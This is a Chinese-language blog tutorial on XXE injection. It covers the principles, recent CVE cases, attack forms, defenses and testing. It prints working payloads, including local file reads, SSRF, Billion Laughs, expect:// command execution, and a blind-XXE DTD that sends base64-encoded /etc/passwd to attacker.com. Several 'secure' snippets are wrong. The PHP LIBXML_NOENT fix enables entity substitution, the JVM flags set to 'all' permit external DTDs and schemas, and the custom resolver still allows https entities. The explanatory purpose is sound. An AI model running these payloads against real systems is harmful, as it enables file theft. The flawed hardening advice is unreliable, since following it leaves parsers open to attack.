XML外部实体注入（XXE）漏洞：从原理到防御的全面解析

原创已于 2026-04-23 13:47:46 修改 · 955 阅读

7 ·

CC 4.0 BY-SA版权

文章标签：

#xml

于 2026-04-23 13:37:40 首次发布

一、XXE漏洞的基本概念与原理

XML外部实体注入（XML External Entity Injection，简称XXE）是一种针对XML解析器的安全漏洞，常年位列OWASP Top 10安全威胁榜单。它的本质是攻击者利用XML解析器在处理包含恶意外部实体声明的XML文档时，未对外部资源的加载行为做限制，从而实施非法操作的一类注入型漏洞。

XML与DTD基础

XML（可扩展标记语言）是一种用于传输和存储数据的标记语言，广泛应用于Web服务、配置文件、数据交换等场景。DTD（文档类型定义）是XML文档的语法规则定义，其中包含实体（Entity）的概念。实体就像是XML中的变量，可以引用内部或外部的内容。

实体分类：

内部实体：值直接定义在XML文档内部
```
<!ENTITY internal "Hello World">
```
外部实体：值来源于外部文件或网络资源
```
<!ENTITY external SYSTEM "file:///etc/passwd">
```

XXE漏洞产生机制

当应用程序接收用户可控的XML输入，并使用配置不当的XML解析器处理时，攻击者可以在XML中插入恶意的外部实体声明，诱导解析器加载攻击者指定的外部资源。

一个典型的恶意XXE Payload：

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>

当不安全的XML解析器处理这个文档时，它会读取file:///etc/passwd文件的内容，并将其插入到&xxe;的位置，从而导致敏感文件泄露。

二、与时俱进：2025-2026年最新XXE漏洞案例

尽管XXE漏洞已存在多年，但在新的技术栈和组件中仍不断出现。以下是2025-2026年间曝出的几个典型案例：

1. Apache Tika严重XXE漏洞（CVE-2025-66516）

2025年底曝出的这个严重漏洞CVSS评分高达10分。Apache Tika是一个开源的内容分析工具，用于从各种文档格式中提取文本和元数据。

漏洞原理：为了解析PDF XFA中的XML数据，Tika通过XMLReaderUtils类构造XMLStreamReader，但getXMLInputFactory中的property并未对外部实体和外部DTD进行防护，同时setXMLResolver中的Handler处理时将外部实体设置为空字符串。这导致使用JDK内部的stax XML解析器处理XML文件时出现XXE问题。

影响范围：

tika-core（1.13-3.2.1）
tika-parser-pdf-module（2.0.0-3.2.1）
tika-parsers（1.13-1.28.5）

修复方案：升级至tika-core ≥3.2.2、tika-parser-pdf-module ≥3.2.2。

2. GeoServer XML外部实体注入漏洞（CVE-2025-58360）

GeoServer是一款开源的地理空间数据服务器，广泛应用于GIS领域。2025年11月披露的该漏洞影响/geoserver/wms端点的GetMap操作。

技术细节：漏洞出在src/wms/src/main/java/org/geoserver/sld/SLDXmlRequestReader.java文件中。问题代码中第四个参数传入了null，这意味着没有传入任何实体解析器，底层默认使用标准XML解析器的行为——允许DOCTYPE声明和外部实体引用。

攻击影响：攻击者可以通过构造恶意的XML请求读取服务器本地文件或发起SSRF攻击。根据网络监测数据，互联网上暴露了超过14,000个GeoServer实例，其中2,451个具有GeoServer指纹的IP地址。

修复建议：升级至GeoServer 2.25.6、2.26.3或2.27.0。

3. Apache Struts XXE漏洞（CVE-2025-68493）

Apache Struts作为流行的Java Web框架，在2026年初被曝出存在XXE漏洞。XWork-Core组件在解析XML配置文件时，未对XML外部实体进行充分校验与限制。

影响版本：

2.0.0-2.3.37
2.5.0-2.5.33
6.0.0-6.1.0

解决方案：升级到Apache Struts 6.1.1及以上版本。

4. Apache Syncope XXE漏洞（CVE-2026-23795）

Apache Syncope身份管理控制台在2026年2月被曝出存在严重的XXE漏洞。当管理员创建或编辑Keymaster参数时，控制台中对XML外部实体引用的限制不当，会为XXE攻击打开通道。

危害：具有管理员权限的攻击者可构造恶意XML payload，导致敏感用户数据泄露并攻陷会话安全。鉴于Syncope作为用户身份与访问管理平台的角色，该漏洞的影响不仅限于个别会话，更可能危及整个认证基础设施。

5. Cisco ISE XXE漏洞（CVE-2026-20029）

Cisco Identity Services Engine（ISE）和ISE-PIC在2026年1月被曝出存在CVSS评分4.9的XXE漏洞。虽然需要管理员权限，但攻击者可突破应用沙箱读取系统文件，且PoC已公开。

三、XXE攻击的多种形式与危害

XXE攻击远不止是读取文件那么简单，它有着多种攻击形式和严重的危害：

1. 敏感文件读取

这是最基本的攻击形式，通过file://协议读取服务器上的敏感文件：

/etc/passwd、/etc/shadow（Linux系统）
C:\Windows\System32\drivers\etc\hosts（Windows系统）
应用程序配置文件、数据库连接字符串
SSH私钥、SSL证书等

2. 服务端请求伪造（SSRF）

通过http://、https://、ftp://等协议，攻击者可以：

探测内网服务拓扑结构
访问内网未授权接口
利用内网应用的身份认证cookie进行进一步攻击
作为跳板攻击其他内部系统

示例Payload：

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://192.168.1.100:8080/admin">
]>

3. 盲注XXE（Blind XXE）

当攻击结果不直接回显时，攻击者可以通过外带技术（Out-of-Band）获取数据：

攻击流程：

攻击者托管恶意DTD文件（如http://attacker.com/evil.dtd）：

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://attacker.com/?data=%file;'>">

触发XML解析：

<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">
  %remote;
  %int;
  %send;
]>

攻击者服务器接收Base64编码的数据并解码

4. 拒绝服务攻击（DoS）

通过递归定义参数实体，可以实施"十亿笑声攻击"（Billion Laughs Attack）：

<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>

一个包含10层递归的实体引用可生成超过10亿次解析操作，耗尽服务器内存资源。

5. 命令执行（特定环境）

在某些特定配置下，结合PHP的expect://伪协议可以实现命令执行：

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "expect://id">
]>
<data>&xxe;</data>

四、XXE漏洞防御措施与最佳实践

防御XXE漏洞需要从代码层、架构层到运维层的全方位防护。以下是2025-2026年的最新防御实践：

1. 代码层防御：禁用外部实体与安全解析

Java环境配置

// SAXParserFactory防护
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

// DocumentBuilderFactory防护
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setExpandEntityReferences(false);

// XMLInputFactory防护
XMLInputFactory xif = XMLInputFactory.newInstance();
xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);

PHP环境配置

// 最有效的方法：禁用外部实体加载
libxml_disable_entity_loader(true);

// 使用DOMDocument时的安全配置
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); // 危险配置
// 应改为：
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT); // 禁用DTD加载

Python环境配置

from lxml import etree

# 使用lxml时的安全配置
parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.parse(xml_file, parser)

# 或者使用defusedxml库
from defusedxml.ElementTree import parse
tree = parse(xml_file)

.NET环境配置

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit; // 禁用DTD处理
settings.XmlResolver = null; // 禁用XML解析器
XmlReader reader = XmlReader.Create(inputStream, settings);

2. 输入验证与过滤

在XML解析前进行严格的输入验证：

// 剥离危险DOCTYPE声明
$filtered = preg_replace('/<!DOCTYPE[^>[]*(\[[^]]*\])?>/', '', $input);

// 检查是否包含外部实体引用
if (preg_match('/<!ENTITY.*SYSTEM/i', $input)) {
    throw new Exception("Malicious XML detected");
}

// 使用白名单验证XML结构
$schema = __DIR__.'/schema.xsd';
libxml_use_internal_errors(true);
if (!$xml->schemaValidate($schema)) {
    throw new Exception("Invalid XML structure");
}

3. 架构层防御

Web应用防火墙（WAF）规则

部署WAF拦截包含恶意实体payload的请求：

拦截包含<!DOCTYPE、<!ENTITY、SYSTEM、PUBLIC等关键词的请求
检测file://、http://、ftp://等危险协议
限制XML文档大小，防止DoS攻击

网络隔离与最小权限原则

Web应用使用低权限用户运行，限制文件系统访问范围
XML解析服务部署在隔离的网络区域
禁用不必要的网络协议和端口
实施严格的网络访问控制策略

协议白名单限制

如果业务允许，禁用高危协议：

// 自定义EntityResolver，只允许特定协议
public class SafeEntityResolver implements EntityResolver {
    @Override
    public InputSource resolveEntity(String publicId, String systemId) {
        // 只允许https协议
        if (systemId != null && systemId.startsWith("https://")) {
            return null; // 让解析器使用默认行为
        }
        // 其他协议一律拒绝
        throw new SAXException("External entity not allowed: " + systemId);
    }
}

4. 替代方案与升级策略

优先使用JSON替代XML

如果业务允许，优先采用JSON作为数据交换格式：

{
  "user": {
    "name": "John",
    "email": "john@example.com"
  }
}

及时升级依赖库

定期更新XML解析库和相关组件：

使用自动化依赖检查工具（如OWASP Dependency-Check）
关注安全公告，及时应用安全补丁
对于不再维护的旧版本库，考虑迁移到新版本

SOAP协议安全配置

对于使用SOAP协议的Web服务：

// Apache CXF配置
System.setProperty("org.apache.cxf.stax.allowEntities", "false");

// 禁用不必要的协议
// 如果不需要文件上传功能，应禁用MTOM/XOP支持[10](@ref)

5. 运行时环境加固

PHP运行时配置

; php.ini配置
allow_url_fopen = Off
allow_url_include = Off

Java虚拟机参数

# 禁用外部实体处理
-Djavax.xml.accessExternalDTD=all
-Djavax.xml.accessExternalSchema=all

五、自动化检测与安全开发实践

1. 代码审计与白盒测试

关键函数/类检查：

PHP：simplexml_load_string()、DOMDocument::loadXML()
Java：DocumentBuilder.parse()、SAXParser.parse()
Python：lxml.etree.parse()、xml.etree.ElementTree.parse()

依赖库版本检查：

# 检查libxml2版本（Linux）
apt list --installed | grep libxml2

# Maven项目检查
mvn dependency:tree | grep xerces
mvn dependency:tree | grep xalan

2. 黑盒测试与渗透测试

测试步骤：

修改请求类型：将Content-Type从application/json改为application/xml

提交测试载荷：

<?xml version="1.0"?>
<!DOCTYPE test [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<test>&xxe;</test>

探测XML处理接口：尝试访问/api.ashx、/service.svc、/data.xml等路径
使用自动化工具：
- XXEinjector：支持多协议探测与盲注自动化
- Burp Suite插件：通过Collaborator检测带外请求
- OWASP ZAP：内置XXE扫描规则

3. 安全开发规范

安全编码培训：开发人员必须了解XXE漏洞的原理和危害
代码审查流程：将XXE检测纳入代码审查清单
自动化安全测试：在CI/CD流水线中集成SAST工具
漏洞奖励计划：鼓励白帽子报告XXE漏洞

六、总结与展望

XXE漏洞虽然是一个"古老"的安全问题，但在现代Web应用中仍然广泛存在。从2025-2026年的最新案例可以看出，即使是Apache Tika、GeoServer、Apache Struts等成熟的开源项目，也仍然会受到XXE漏洞的影响。

关键要点总结：

XXE漏洞的本质是XML解析器对外部实体处理不当
攻击形式多样：从文件读取到SSRF，从盲注到DoS
防御需要多层次：代码层禁用外部实体、输入验证、架构层WAF、网络隔离
与时俱进很重要：及时更新依赖库，关注最新安全公告
安全意识是关键：开发人员的安全意识和规范的开发流程是防御的第一道防线

随着微服务架构和API经济的兴起，XML作为数据交换格式的使用虽然有所减少，但在企业级应用、地理信息系统、内容管理系统等领域仍然广泛使用。因此，XXE漏洞的防御仍然是Web安全中不可忽视的重要环节。

未来趋势：

自动化防御工具的发展将更加智能化
云原生环境下的XXE防御需要新的策略
AI辅助代码审计将提高XXE漏洞的发现效率
供应链安全将成为XXE防御的新焦点

通过全面的防御策略和持续的安全意识教育，我们可以有效降低XXE漏洞带来的风险，构建更加安全的Web应用环境。

七、法律与道德警示：技术学习的正确边界

在深入探讨XXE漏洞原理与防御技术的同时，我们必须明确强调网络安全技术的合法使用边界。本文所有技术内容仅供合法授权下的安全研究、漏洞防御和安全教育之目的。

1. 明确法律红线

根据《中华人民共和国网络安全法》、《中华人民共和国刑法》及相关法律法规：

第二百八十五条【非法侵入计算机信息系统罪】违反国家规定，侵入计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。
第二百八十六条【破坏计算机信息系统罪】违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。

重要提示：未经授权的任何渗透测试、漏洞利用、数据获取行为均属违法，无论目的是否为"学习"或"测试"。